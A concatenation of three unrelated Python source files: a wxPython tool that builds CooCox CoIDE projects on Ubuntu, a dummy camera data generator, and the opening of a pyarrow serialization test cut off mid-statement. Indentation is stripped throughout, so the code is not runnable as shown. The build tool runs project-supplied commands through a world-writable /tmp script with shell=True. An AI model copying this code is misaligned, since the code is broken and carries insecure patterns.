self.projectDef=[]
self.curProject=-1
self.srcListDef=[]
self.hdListDef=[]
self.loadedFile=""
def doload(self,afile):
print "[MyListCtrl] doload project"
#ok, now unload current
del self.projectDef[:]
del self.srcListDef[:]
del self.hdListDef[:]
IROMORIGIN=0x08000000
IROMLENGTH=0x0001EF00
IRAMORIGIN=0x20000000
IRAMLENGTH=0x00004000
self.projectDef=[]
self.curProject=-1
self.srcListDef=[]
self.hdListDef=[]
self.loadedFile=afile
self.ClearAll()
self.InsertColumn(0, 'Project')
self.SetColumnWidth(0, 600)
set_startpath(os.path.dirname(os.path.realpath(afile)))
savePref()
tree = ET.parse(afile)
root = tree.getroot()
allPath=[]
for files in root.iter('Files'):
for afile in files.iter('File'):
rnp=afile.get('path')
rns=rnp.split('/')
if afile.get('type') == '1':
[fileName, fileExtension]=os.path.splitext(os.path.basename(rnp))
if fileExtension == '.h':
self.hdListDef.append(rnp)
else:
self.srcListDef.append(rnp)
for hd in self.hdListDef:
allPath.append(os.path.dirname(hd))
for src in self.srcListDef:
allPath.append(os.path.dirname(src))
allPath.sort()
allPath=list(set(allPath))
for target in root.iter('Target'):
aproject=[]
BuildOption=target.find('BuildOption')
Compile=BuildOption.find('Compile')
compOpt="-mcpu=cortex-m0 -mthumb -Wall -ffunction-sections -g -I"+startpath()+" "
linkOpt="-mcpu=cortex-m0 -mthumb -g -nostartfiles -Wl,-Map=Module.map"
isCurrent=False
if target.get('isCurrent')=="1":
isCurrent=True
for opt in Compile.iter('Option'):
if opt.get('name')=='OptimizationLevel':
if opt.get('value')==4:
compOpt=compOpt+" -Os"+" "
linkOpt=linkOpt+" -Os"+" "
else:
compOpt=compOpt+" -O"+opt.get('value')+" "
linkOpt=linkOpt+" -O"+opt.get('value')+" "
elif opt.get('name')=='UserEditCompiler':
otherOpt=opt.get('value').replace(";"," ")
compOpt=compOpt+otherOpt+" "
Includepaths = Compile.find('Includepaths')
for ip in Includepaths.iter('Includepath'):
compOpt=compOpt+" -I"+os.path.join(startpath(),ip.get('path'))
for pt in allPath:
compOpt=compOpt+" -I"+os.path.join(startpath(),pt)
DefinedSymbols = Compile.find('DefinedSymbols')
defOpt=[]
for ds in DefinedSymbols.iter('Define'):
compOpt=compOpt+" -D" + ds.get('name')
defOpt.append(ds.get('name'))
Link=BuildOption.find('Link')
for opt in Link.iter('Option'):
if opt.get('name')=='UserEditLinker':
otherOpt=opt.get('value').replace(";"," ")
linkOpt=linkOpt+otherOpt+" "
LocateLinkFile=Link.find('LocateLinkFile')
LocateLinkFilePath=LocateLinkFile.get('path').replace('\\','/')
linkOpt=linkOpt+" -Wl,--gc-sections --specs=nano.specs -Wl,-T"+os.path.join(startpath(),LocateLinkFilePath)
LinkedLibraries=Link.find('LinkedLibraries')
for ll in LinkedLibraries.iter('Libset'):
alibdir=os.path.join(startpath(),ll.get('dir'))
alibdir=alibdir.replace('\\','/')
compOpt=compOpt+" -L" + alibdir+" "
compOpt=compOpt+" -l" + ll.get('libs')+" "
linkOpt=linkOpt+" -L" + alibdir+" "
linkOpt=linkOpt+" -l" + ll.get('libs')+" "
MemoryAreas=Link.find('MemoryAreas')
for ma in MemoryAreas.iter('Memory'):
if ma.get('name')=='IROM1':
IROMLENGTH=ma.get('size')
IROMORIGIN=ma.get('startValue')
if ma.get('name')=='IRAM1':
IRAMLENGTH=ma.get('size')
IRAMORIGIN=ma.get('startValue')
isLibrary=False
outputName='Module'
Output=BuildOption.find('Output')
for opt in Output.iter('Option'):
if opt.get('name') == 'OutputFileType':
if opt.get('value')=='1':
isLibrary=True
elif opt.get('name') == 'Name':
outputName= opt.get('value')
beforeBuild=[]
backupLD="cp %s %s.backup" %(os.path.join(startpath(),LocateLinkFilePath),os.path.join(startpath(),LocateLinkFilePath))
sedROM="sed -i 's/rom (rx).*/rom (rx) : ORIGIN = %s, LENGTH = %s/' %s" %(IROMORIGIN,IROMLENGTH,os.path.join(startpath(),LocateLinkFilePath))
sedRAM="sed -i 's/ram (rwx).*/ram (rwx) : ORIGIN = %s, LENGTH = %s/' %s" %(IRAMORIGIN,IRAMLENGTH,os.path.join(startpath(),LocateLinkFilePath))
beforeBuild.append(backupLD)
beforeBuild.append(sedROM)
beforeBuild.append(sedRAM)
restoreLD="mv %s.backup %s" %(os.path.join(startpath(),LocateLinkFilePath),os.path.join(startpath(),LocateLinkFilePath))
afterGCC=[]
afterGCC.append(restoreLD)
afterBuild=[]
User=BuildOption.find('User')
for UserRun in User.iter('UserRun'):
if UserRun.get('type')=='Before' and UserRun.get('checked')=='1':
exe=UserRun.get('value')
exe=exe.replace('${project.path}',startpath())
exe=exe.replace('\\','/')
exe=exe.replace('.bat','.sh')
exe=exe.replace('.exe','')
exe=exe.replace('copy','cp -f')
beforeBuild.append(exe)
elif UserRun.get('type')=='After' and UserRun.get('checked')=='1':
exe=UserRun.get('value')
exe=exe.replace('${project.path}',startpath())
exe=exe.replace('\\','/')
exe=exe.replace('.bat','.sh')
exe=exe.replace('.exe','')
exe=exe.replace('copy','cp -f')
afterBuild.append(exe)
#[name1,outdir1,[define options]1,isLibrary1,outputName1,compile option1,link option1, [before build]1,[aftergcc]1,[after build]1,srclist]
aproject.append(target.get('name'))
aproject.append(os.path.join(startpath(),target.get('name')))
aproject.append(defOpt)
aproject.append(isLibrary)
aproject.append(outputName)
aproject.append(compOpt)
aproject.append(linkOpt)
aproject.append(beforeBuild)
aproject.append(afterGCC)
aproject.append(afterBuild)
if isCurrent==True:
self.projectDef.insert(0,aproject)
else:
self.projectDef.append(aproject)
srclist=[]
for srcfile in self.srcListDef:
srclist.append(os.path.join(startpath(),srcfile))
aproject.append(srclist)
return True
def load(self):
print "[MyListCtrl] load project"
openFileDialog = wx.FileDialog(self.parent, "Open", startpath(), "", "CoIDE project (*.coproj)|*.coproj", wx.FD_OPEN | wx.FD_FILE_MUST_EXIST)
if openFileDialog.ShowModal() == wx.ID_CANCEL:
openFileDialog.Destroy()
return False # the user changed idea...
afile=openFileDialog.GetPath()
openFileDialog.Destroy()
if not afile:
return False
return self.doload(afile)
def getload(self):
print "[MyListCtrl] getload::",self.loadedFile
return self.loadedFile
def unload(self):
print "[MyListCtrl] unlaod current"
del self.projectDef[:]
del self.srcListDef[:]
del self.hdListDef[:]
self.projectDef=[]
self.curProject=-1
self.srcListDef=[]
self.hdListDef=[]
self.loadedFile=""
self.ClearAll()
self.InsertColumn(0, 'Project')
self.SetColumnWidth(0, 600)
def getSubP(self):
return self.projectDef
def setSubProjectList(self,suprojectIndex):
print "[MyListCtrl]update sub pj"
self.ClearAll()
self.InsertColumn(0, 'Project')
self.SetColumnWidth(0, 600)
self.curProject=suprojectIndex
j=1
self.InsertStringItem(j,drawALine())
j=j+1
self.InsertStringItem(j, " " +os.path.basename(self.loadedFile) + " Loaded")
j=j+1
self.InsertStringItem(j,drawALine())
j=j+1
self.InsertStringItem(j, " OPTIONS")
j=j+1
self.InsertStringItem(j,drawALine())
j=j+1
for defopt in self.projectDef[self.curProject][2]:
self.InsertStringItem(j, defopt)
j=j+1
self.InsertStringItem(j, " ")
j=j+1
self.InsertStringItem(j,drawALine())
j=j+1
self.InsertStringItem(j, " C FILES")
j=j+1
self.InsertStringItem(j,drawALine())
j=j+1
for afile in self.srcListDef :
self.InsertStringItem(j, "+ - - - - - - "+afile)
j=j+1
self.InsertStringItem(j, " ")
j=j+1
self.InsertStringItem(j,drawALine())
j=j+1
self.InsertStringItem(j, " HEADER FILES")
j=j+1
self.InsertStringItem(j,drawALine())
j=j+1
for afile in self.hdListDef:
self.InsertStringItem(j, "+ - - - - - - "+afile)
j=j+1
self.InsertStringItem(j, " ")
j=j+1
#[name1,outdir1,[define options]1,isLibrary1,outputName1,compile option1,link option1, [before build]1,[after build]1]
def generateBuildScript(self,afile,clean=False):
print "[MyListCtrl]generate build script " +afile
blib=self.projectDef[self.curProject][3]
pname=self.projectDef[self.curProject][4]
f=open(afile,"w")
f.write("#!/bin/sh\n")
f.write("STARTTIME=$(date +%s)\n")
if len(self.projectDef[self.curProject][7])>0:
for scr in self.projectDef[self.curProject][7]:
f.write(scr+'\n')
if blib== True:
f.write('echo "Compiling ' +self.projectDef[self.curProject][0] +' Library."\n')
else:
f.write('echo "Compiling ' +self.projectDef[self.curProject][0] +' Binary."\n')
f.write('echo "creating output directories:"\n')
f.write('echo "[mkdir] ' + self.projectDef[self.curProject][1]+'/Debug/bin"\n')
f.write('echo "[mkdir] ' + self.projectDef[self.curProject][1]+'/Debug/obj"\n')
f.write('mkdir -p ' + self.projectDef[self.curProject][1]+'/Debug/obj\n')
f.write('mkdir -p ' + self.projectDef[self.curProject][1]+'/Debug/bin\n')
f.write('mkdir -p ' + self.projectDef[self.curProject][1]+'/Debug/obj\n')
f.write('rm -f ' + self.projectDef[self.curProject][1]+'/Debug/bin/*\n')
f.write('rm -f ' + self.projectDef[self.curProject][1]+'/Debug/obj/*\n')
f.write('cd ' +self.projectDef[self.curProject][1]+'/Debug/obj\n')
f.write('echo "%d total files to be compiled"\n' %len(self.srcListDef))
f.write('echo "'+toolChainPrefix()+'gcc '+self.projectDef[self.curProject][5]+' -c files..."\n')
f.write(os.path.join(toolChainPath(),toolChainPrefix())+'gcc '+self.projectDef[self.curProject][5] +' -c')
f.write(' \\\n')
for srcfile in self.projectDef[self.curProject][10][0:-1]:
f.write(' ' + srcfile + ' \\\n')
f.write(' ' +self.projectDef[self.curProject][10][-1] + '\n')
f.write('\n')
f.write('cd ' +self.projectDef[self.curProject][1]+'/Debug/bin/\n')
if blib== True:
f.write('echo "Generating Library."\n')
f.write(os.path.join(toolChainPath(),toolChainPrefix())+'ar rvs lib'+pname+'.a ')
for srcfile in self.srcListDef:
[fileName, fileExtension]=os.path.splitext(os.path.basename(srcfile))
f.write(' '+os.path.join('../obj',fileName+'.o'))
f.write('\n')
f.write('if [ $? -ne 0 ]\n')
f.write('then\n')
f.write('\tENDTIME=$(date +%s)\n')
f.write('\t'+'echo ""\n')
f.write('\t'+'echo ""\n')
f.write('\t'+'echo ""\n')
f.write('\techo "BUILD FAILED in $(($ENDTIME - $STARTTIME)) seconds..."\n')
f.write('else\n')
else:
f.write('echo "Linking Binary."\n')
f.write('echo "['+toolChainPrefix()+'gcc] -o '+pname+'.elf files... '+self.projectDef[self.curProject][6]+'"\n')
f.write(os.path.join(toolChainPath(),toolChainPrefix())+'gcc -o '+pname+'.elf ')
for srcfile in self.srcListDef:
[fileName, fileExtension]=os.path.splitext(os.path.basename(srcfile))
f.write(' '+os.path.join('../obj',fileName+'.o'))
f.write(' '+self.projectDef[self.curProject][6]+'\n')
f.write('if [ $? -ne 0 ]\n')
f.write('then\n')
f.write('\tENDTIME=$(date +%s)\n')
f.write('\t'+'echo ""\n')
f.write('\t'+'echo ""\n')
f.write('\t'+'echo ""\n')
f.write('\techo "BUILD FAILED !!!!![$(($ENDTIME - $STARTTIME)) seconds elapsed]"\n')
f.write('\t'+'echo ""\n')
f.write('\t'+'echo ""\n')
f.write('\t'+'echo ""\n')
f.write('else\n')
f.write('\techo "Generating hex and bin output:"\n')
f.write('\t'+os.path.join(toolChainPath(),toolChainPrefix())+'objcopy -O ihex "' + pname+'.elf" "'+pname+'.hex"\n')
f.write('\t'+os.path.join(toolChainPath(),toolChainPrefix())+'objcopy -O binary "' + pname+'.elf" "'+pname+'.bin"\n')
f.write('\t'+'echo "Program Size:"\n')
f.write('\t'+os.path.join(toolChainPath(),toolChainPrefix())+'size Module.elf\n')
f.write('\t'+'cd ' + startpath()+'\n')
if len(self.projectDef[self.curProject][9])>0:
for scr in self.projectDef[self.curProject][9]:
f.write('\t'+scr+'\n')
f.write('\t'+'ENDTIME=$(date +%s)\n')
f.write('\t'+'echo ""\n')
f.write('\t'+'echo ""\n')
f.write('\t'+'echo ""\n')
f.write('\t'+'echo "BUILD SUCCESSFULL [$(($ENDTIME - $STARTTIME)) seconds elapsed]"\n')
f.write('\t'+'echo ""\n')
f.write('\t'+'echo ""\n')
f.write('\t'+'echo ""\n')
f.write('fi\n')
if len(self.projectDef[self.curProject][8])>0:
for scr in self.projectDef[self.curProject][8]:
f.write(scr+'\n')
f.write('cd ' + startpath()+'\n')
f.close()
os.chmod(afile, 0777)
class MyLogCtrl(wx.TextCtrl):
def __init__(self, parent, id):
wx.TextCtrl.__init__(self, parent, id, style=wx.TE_MULTILINE | wx.HSCROLL)
self.Clear()
class MainWindow(wx.Frame):
def __init__(self, parent, id, title):
wx.Frame.__init__(self, parent, -1, title)
self.splitter = wx.SplitterWindow(self, ID_SPLITTER, style=wx.SP_BORDER)
self.splitter.SetMinimumPaneSize(50)
self.showProject = MyPjMgrCtrl(self.splitter, -1)
self.showLog = MyLogCtrl(self.splitter, -1)
self.splitter.SplitVertically(self.showProject, self.showLog,-200)
self.Bind(wx.EVT_SIZE, self.OnSize)
self.Bind(wx.EVT_SPLITTER_DCLICK, self.OnDoubleClick, id=ID_SPLITTER)
self.filemenu= wx.Menu()
fe=self.filemenu.Append(ID_EXIT,"E&xit"," Terminate the program")
self.Bind(wx.EVT_MENU, self.OnExit, fe)
self.helpmenu = wx.Menu()
fab=self.helpmenu.Append(ID_ABOUT,"A&bout"," About this")
self.Bind(wx.EVT_MENU, self.onAbout, fab)
self.building=False
self.cancel=0
self.menuBar = wx.MenuBar()
self.menuBar.Append(self.filemenu,"&File")
self.menuBar.Append(self.helpmenu, "&Help")
self.SetMenuBar(self.menuBar)
self.Bind(wx.EVT_MENU, self.OnExit, id=ID_EXIT)
self.sizer2 = wx.BoxSizer(wx.HORIZONTAL)
self.comboBox=wx.ComboBox(self, -1)
self.Bind(wx.EVT_COMBOBOX, self.OnSelectSubProject)
self.buttonLOAD = wx.Button(self, ID_LOAD, "Load")
self.Bind(wx.EVT_BUTTON, self.OnLoad, id=ID_LOAD)
self.buttonUNLOAD = wx.Button(self, ID_UNLOAD, "Unload")
self.Bind(wx.EVT_BUTTON, self.OnUnload, id=ID_UNLOAD)
self.buttonRELOAD = wx.Button(self, ID_RELOAD, "Reload")
self.Bind(wx.EVT_BUTTON, self.OnReload, id=ID_RELOAD)
self.buttonTOOLCHAIN = wx.Button(self, ID_TOOLCHAIN, "Toolchain")
self.Bind(wx.EVT_BUTTON, self.OnToolchain, id=ID_TOOLCHAIN)
self.buttonCONFIGURE = wx.Button(self, ID_CONFIGURE, "Configure")
self.Bind(wx.EVT_BUTTON, self.OnConfigure, id=ID_CONFIGURE)
self.buttonBUILD = wx.Button(self, ID_BUILD, "Build")
self.Bind(wx.EVT_BUTTON, self.OnBuild, id=ID_BUILD)
self.buttonREBUILD = wx.Button(self, ID_REBUILD, "Rebuild")
self.Bind(wx.EVT_BUTTON, self.OnRebuild, id=ID_REBUILD)
self.buttonCANCEL = wx.Button(self, ID_CANCELBUILD, "Cancel")
self.Bind(wx.EVT_BUTTON, self.OnCancel, id=ID_CANCELBUILD)
self.buttonBUILDSCRIPT = wx.Button(self, ID_BUILDSCRIPT, "Generate build script")
self.Bind(wx.EVT_BUTTON, self.OnGenerateBuildScript, id=ID_BUILDSCRIPT)
self.buttonEXIT = wx.Button(self, ID_EXIT, "Quit")
self.Bind(wx.EVT_BUTTON, self.OnExit, id=ID_EXIT)
self.sizer2.Add(self.comboBox, 2, wx.EXPAND)
self.sizer2.Add(self.buttonLOAD, 1, wx.EXPAND)
self.sizer2.Add(self.buttonUNLOAD, 1, wx.EXPAND)
self.sizer2.Add(self.buttonRELOAD, 1, wx.EXPAND)
self.sizer2.Add(self.buttonTOOLCHAIN, 1, wx.EXPAND)
self.sizer2.Add(self.buttonCONFIGURE, 1, wx.EXPAND)
self.sizer2.Add(self.buttonBUILD, 1, wx.EXPAND)
self.sizer2.Add(self.buttonREBUILD, 1, wx.EXPAND)
self.sizer2.Add(self.buttonCANCEL, 1, wx.EXPAND)
self.sizer2.Add(self.buttonBUILDSCRIPT, 1, wx.EXPAND)
self.sizer2.Add(self.buttonEXIT, 1, wx.EXPAND)
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.sizer.Add(self.sizer2,0,wx.EXPAND)
self.sizer.Add(self.splitter,1,wx.EXPAND)
self.SetSizer(self.sizer)
size = wx.DisplaySize()
self.SetSize(size)
self.sb = self.CreateStatusBar()
self.sb.SetStatusText(os.getcwd())
self.Center()
self.Show(True)
self.nothingLoaded()
self.Bind(EVT_BUILD_UPGRADE_LOG, self.upgradeLog)
self.Bind(EVT_END_BUILD_DONE, self.buildDone)
def onAbout(self, event):
dlg = wx.MessageDialog(self, "PY Tool that understand CooCox IDE project.\n Let people compile their CoIDE project on Ubuntu.\nVersion " +VERSION,"About",wx.OK|wx.ICON_EXCLAMATION)
dlg.ShowModal()
dlg.Destroy()
def greyOutAll(self,grey=True):
if grey==True:
self.cancel=0
self.building=True
self.buttonLOAD.Disable()
self.buttonUNLOAD.Disable()
self.buttonRELOAD.Disable()
self.buttonTOOLCHAIN.Disable()
self.buttonCONFIGURE.Disable()
self.buttonBUILD.Disable()
self.buttonCANCEL.Enable()
self.buttonREBUILD.Disable()
self.buttonBUILDSCRIPT.Disable()
self.buttonEXIT.Enable()
else:
self.building=False
self.buttonLOAD.Enable()
self.buttonUNLOAD.Enable()
self.buttonRELOAD.Enable()
self.buttonTOOLCHAIN.Enable()
self.buttonCONFIGURE.Enable()
self.buttonBUILD.Enable()
self.buttonREBUILD.Enable()
self.buttonCANCEL.Disable()
self.buttonBUILDSCRIPT.Enable()
self.buttonEXIT.Enable()
def nothingLoaded(self):
self.comboBox.Disable()
self.comboBox.Clear()
self.buttonLOAD.Enable()
self.buttonUNLOAD.Disable()
self.buttonRELOAD.Disable()
self.buttonTOOLCHAIN.Enable()
self.buttonCONFIGURE.Disable()
self.buttonBUILD.Disable()
self.buttonREBUILD.Disable()
self.buttonCANCEL.Disable()
self.buttonBUILDSCRIPT.Disable()
self.buttonEXIT.Enable()
self.projectloaded=False
def loaded(self):
self.buttonLOAD.Enable()
self.buttonUNLOAD.Enable()
self.buttonRELOAD.Enable()
self.buttonTOOLCHAIN.Enable()
self.buttonCONFIGURE.Enable()
self.buttonBUILD.Enable()
self.buttonREBUILD.Enable()
self.buttonBUILDSCRIPT.Enable()
self.buttonEXIT.Enable()
plist = self.showProject.getSubP()
self.comboBox.Clear()
for p in plist:
self.comboBox.Append(p[0])
self.comboBox.SetSelection(0)
self.comboBox.Enable()
self.showProject.setSubProjectList(0)
self.projectloaded=True
def OnDoubleClick(self, event):
size = self.GetSize()
self.splitter.SetSashPosition(size.x / 2)
def OnSize(self, event):
size = self.GetSize()
self.splitter.SetSashPosition(size.x / 2)
self.sb.SetStatusText(os.getcwd())
event.Skip()
def OnLoad(self, event):
if not toolChainPath():
wx.MessageBox("Please select toolchain first")
return
if not toolChainPrefix():
wx.MessageBox("Please select toolchain first")
return
self.showLog.AppendText("Loading project....")
if self.showProject.load()==True:
self.loaded()
self.showLog.AppendText("done\n")
else:
self.showLog.AppendText("aborted\n")
def OnUnload(self, event):
self.showLog.AppendText("Project unloaded\n")
self.showProject.unload()
self.nothingLoaded()
def OnReload(self,event):
self.showLog.AppendText("Project reloaded\n")
loaded=self.showProject.getload()
self.showProject.unload()
self.showProject.doload(loaded)
if self.showProject.doload(loaded)==True:
self.loaded()
self.showLog.AppendText("done\n")
else:
self.showLog.AppendText("aborted\n")
def OnSelectSubProject(self, event):
self.showLog.AppendText("Changing sub project\n")
self.showProject.setSubProjectList(self.comboBox.GetSelection())
def OnToolchain(self, event):
self.showLog.AppendText("Changing toolchain path...")
openFileDialog = wx.FileDialog(self, "Select the gcc binary to use", toolChainPath(),"", "gcc binary|*gcc*", wx.FD_OPEN)
if openFileDialog.ShowModal() == wx.ID_CANCEL:
openFileDialog.Destroy()
self.showLog.AppendText("aborted\n")
return False
#check for
set_toolChainPath(os.path.dirname(os.path.realpath(openFileDialog.GetPath())))
prefix=(os.path.basename(openFileDialog.GetPath())).split('gcc')
set_toolChainPrefix(prefix[0])
savePref()
openFileDialog.Destroy()
self.showLog.AppendText("done\n")
def OnConfigure(self, event):
if self.projectloaded==False:
return
self.showLog.AppendText("Configure project\n")
dlg = wx.MessageDialog(self, "This feature is not yet implemented.\nBut you can still edit the xml " + os.path.basename(self.showProject.getload())+ " manually\n","Sorry...",wx.OK|wx.ICON_EXCLAMATION)
dlg.ShowModal()
dlg.Destroy()
def generateBuildScript(self,afile,clean=False):
self.showLog.AppendText("Generating build script...")
self.showProject.generateBuildScript(afile,clean)
self.showLog.AppendText("done\n")
def upgradeLog(self,event):
self.showLog.AppendText(event.attr1+"\n")
def buildDone(self,event):
self.showLog.AppendText(event.attr1+"\n")
self.greyOutAll(False)
def executeScript(self,usedScript,typeBuild):
j=1
if os.path.isfile(usedScript) == False:
newEvent = EndBuild(attr1=usedScript+ " do not exist.\nCannot "+typeBuild+" !!!!!")
wx.PostEvent(self, newEvent)
return
newEvent = UpgradeLog(attr1="Start " + typeBuild + "...")
wx.PostEvent(self, newEvent)
#GIVE EXECUTE RIGHT
os.chmod(usedScript, 0777)
sub_process = subprocess.Popen(usedScript,shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
for line in iter(sub_process.stdout.readline, ''):
line = line.replace('\r', '').replace('\n', '')
newEvent = UpgradeLog(attr1=line)
wx.PostEvent(self, newEvent)
if self.cancel != 0:
break
if os.path.isfile(usedScript) == True:
os.remove(usedScript)
newEvent = EndBuild(attr1=typeBuild+" process end")
wx.PostEvent(self, newEvent)
self.cancel=2
def OnBuild(self, event):
if self.projectloaded==False:
return
self.showLog.Clear()
self.greyOutAll()
self.building=True
self.showLog.AppendText("Build process start.\n")
self.generateBuildScript("/tmp/build.sh")
t = Thread(target=self.executeScript, args=(["/tmp/build.sh","Build"]))
t.start()
def OnCancel(self, event):
if self.building==False:
return
if self.cancel==0:
newEvent = UpgradeLog(attr1="\n\n\n\t\tCANCELLING....\n\n\n")
wx.PostEvent(self, newEvent)
self.cancel=1
def OnRebuild(self, event):
if self.projectloaded==False:
return
self.showLog.Clear()
self.greyOutAll()
self.showLog.AppendText("Rebuild process start.\n")
self.generateBuildScript("/tmp/rebuild.sh",True)
t = Thread(target=self.executeScript, args=(["/tmp/rebuild.sh","Rebuild"]))
t.start()
def OnGenerateBuildScript(self, event):
if self.projectloaded==False:
return
self.greyOutAll()
self.showLog.AppendText("Generate build script...")
openFileDialog = wx.FileDialog(self, "Save buildscript", startpath(), "", "shell (*.sh)|*.sh", wx.FD_SAVE|wx.FD_OVERWRITE_PROMPT)
if openFileDialog.ShowModal() == wx.ID_CANCEL:
openFileDialog.Destroy()
self.greyOutAll(False)
self.showLog.AppendText("aborted...\n")
return False # the user changed idea...
afile=openFileDialog.GetPath()
[fileName, fileExtension]=os.path.splitext(afile)
if fileExtension != '.sh':
afile=afile+'.sh'
set_startpath(os.path.dirname(os.path.realpath(afile)))
dlg = wx.MessageDialog(self, "Script generated will systematically\n clean before build", "Full rebuild ?", wx.YES_NO | wx.ICON_QUESTION)
fullRebuild = dlg.ShowModal() == wx.ID_YES
dlg.Destroy()
openFileDialog.Destroy()
self.generateBuildScript(afile,fullRebuild)
self.greyOutAll(False)
self.showLog.AppendText("Done\n")
self.showLog.AppendText("Script available in " +afile +"\n")
def OnExit(self,e):
if self.building==True:
if self.cancel==1:
time.sleep(1)
wx.PostEvent(self,e)
return
elif self.cancel==0:
self.cancel=1
self.showLog.AppendText("\n\n\nEXITING......\n\n\n")
wx.PostEvent(self,e)
return
self.Close(True)
def checkPackage(pnameList):
ins=[]
for el in pnameList:
ret=subprocess.Popen("dpkg -l | grep " + el, shell=True, stdout=subprocess.PIPE).stdout.read()
if not ret:
ins.append(el)
if len(ins)>0:
print "\n\n\nFollowing package(s) not installed:"
for el in ins:
print "-" +el
print "Please use sudo apt-get install ... to install them\n\n\n"
exit(1)
#check first if package are installed
checkPackage(["python-wxgtk","python-wxtool","libusb-1.0-0","libusb-1.0-0-dev"])
readPref()
app = wx.App(0)
MainWindow(None, -1, 'Bespoon CoIDE wrapper for ubuntu.')
app.MainLoop()
|
dummyproxy.py | # ----------------------------------------------------------------------
# Author: yury.matveev@desy.de
# ----------------------------------------------------------------------
"""Dummy 2D data generator.
"""
import time
import numpy as np
import logging
from threading import Thread
from petra_camera.devices.base_camera import BaseCamera
from petra_camera.main_window import APP_NAME
logger = logging.getLogger(APP_NAME)
# ----------------------------------------------------------------------
class DummyProxy(BaseCamera):
"""
"""
FRAME_W = 500
FRAME_H = 500
NOISE = 0.27
_settings_map = {'max_width': ('self', 'FRAME_W'),
'max_height': ('self', 'FRAME_H')}
visible_layouts = ('FPS', 'exposure')
# ----------------------------------------------------------------------
def __init__(self, settings):
super(DummyProxy, self).__init__(settings)
x, y = np.meshgrid(np.linspace(-4, 4, self.FRAME_H),
np.linspace(-4, 4, self.FRAME_W))
x += 0.0
y += -1.0
mean, sigma = 0, 0.2
self._baseData = np.exp(-((np.sqrt(x * x + y * y * 4) - mean) ** 2 / (2.0 * sigma ** 2)))
self._data = self._baseData
self.error_flag = False
self.error_msg = ''
self._fps = self.get_settings('FPS', int)
if self._fps == 0:
self._fps = 25
self._generator_thread = Thread(target=self._generator)
self._generate = False
self._run = True
self._new_frame_thead = Thread(target=self._new_frame)
self._generator_thread.start()
self._new_frame_thead.start()
self._generator_thread_working = True
self._new_frame_thead_working = True
# ----------------------------------------------------------------------
def close_camera(self):
self._run = False
while self._generator_thread_working or self._new_frame_thead_working:
time.sleep(self._fps)
# ----------------------------------------------------------------------
def _new_frame(self):
while self._run:
_last_time = time.time()
time.sleep(1 / self._fps)
if self._generate:
self._last_frame = self._data[self._picture_size[0]:self._picture_size[2],
self._picture_size[1]:self._picture_size[3]]
self._new_frame_flag = True
logger.debug(f"{self._my_name} new frame")
_last_time = time.time()
self._new_frame_thead_working = False
# ----------------------------------------------------------------------
def _generator(self):
"""
"""
while self._run:
_last_time = time.time()
time.sleep(1 / 10)
if self._generate:
nPoints = self.FRAME_W * self.FRAME_H
self._data = self._baseData + np.random.uniform(0.0, self.NOISE, nPoints).reshape(self.FRAME_W, self.FRAME_H)
_last_time = time.time()
self._generator_thread_working = False
# ----------------------------------------------------------------------
def start_acquisition(self):
logger.debug(f"{self._my_name} starting thread")
self._generate = True
return True
# ----------------------------------------------------------------------
def stop_acquisition(self):
self._generate = False
# ----------------------------------------------------------------------
def get_settings(self, option, cast):
if option in ['FPSmax', 'max_width', 'max_height']:
logger.debug(f'{self._my_name}: setting {cast.__name__}({option}) requested')
if option == 'FPSmax':
return 200
elif option == 'max_width':
return self.FRAME_W
elif option == 'max_height':
return self.FRAME_H
else:
return super(DummyProxy, self).get_settings(option, cast)
# ----------------------------------------------------------------------
def save_settings(self, option, value):
if option == 'FPS':
logger.debug(f'{self._my_name}: setting {option}: new value {value}')
self._fps = value
super(DummyProxy, self).save_settings(option, value) |
test_serialization.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import division
import pytest
from collections import namedtuple, OrderedDict, defaultdict
import datetime
import os
import string
import sys
import pyarrow as pa
import numpy as np
import pyarrow.tests.util as test_util
try:
import torch
except ImportError:
torch = None
# Blacklist the module in case `import torch` is costly before
# failing (ARROW-2071)
sys.modules['torch'] = None
def assert_equal(obj1, obj2):
if torch is not None and torch.is_tensor(obj1) and torch.is_tensor(obj2):
assert torch.equal(obj1, obj2)
return
module_numpy = (type(obj1).__module__ == np.__name__ or
type(obj2).__module__ == np.__name__)
if module_numpy:
empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ()) or
(hasattr(obj2, "shape") and obj2.shape == ()))
if empty_shape:
# This is a special case because currently np.testing.assert_equal
# fails because we do not properly handle different numerical
# types.
assert obj1 == obj2, ("Objects {} and {} are "
"different.".format(obj1, obj2))
else:
np.testing.assert_equal(obj1, obj2)
elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
special_keys = ["_pytype_"]
assert (set(list(obj1.__dict__.keys()) + special_keys) ==
set(list(obj2.__dict__.keys()) + special_keys)), ("Objects {} "
"and {} are "
"different."
.format(
obj1,
obj2))
try:
# Workaround to make comparison of OrderedDicts work on Python 2.7
if obj1 == obj2:
return
except Exception:
pass
if obj1.__dict__ == {}:
print("WARNING: Empty dict in ", obj1)
for key in obj1.__dict__.keys():
if key not in special_keys:
assert_equal(obj1.__dict__[key], obj2.__dict__[key])
elif type(obj1) is dict or type(obj2) is dict:
assert_equal(obj1.keys(), obj2.keys())
for key in obj1.keys():
assert_equal(obj1[key], obj2[key])
elif type(obj1) is list or type(obj2) is list:
assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
"different lengths."
.format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif type(obj1) is tuple or type(obj2) is tuple:
assert len(obj1) == len(obj2), ("Objects {} and {} are tuples with "
"different lengths."
.format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif (pa.lib.is_named_tuple(type(obj1)) or
pa.lib.is_named_tuple(type(obj2))):
assert len(obj1) == len(obj2), ("Objects {} and {} are named tuples "
"with different lengths."
.format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
else:
assert obj1 == obj2, ("Objects {} and {} are different."
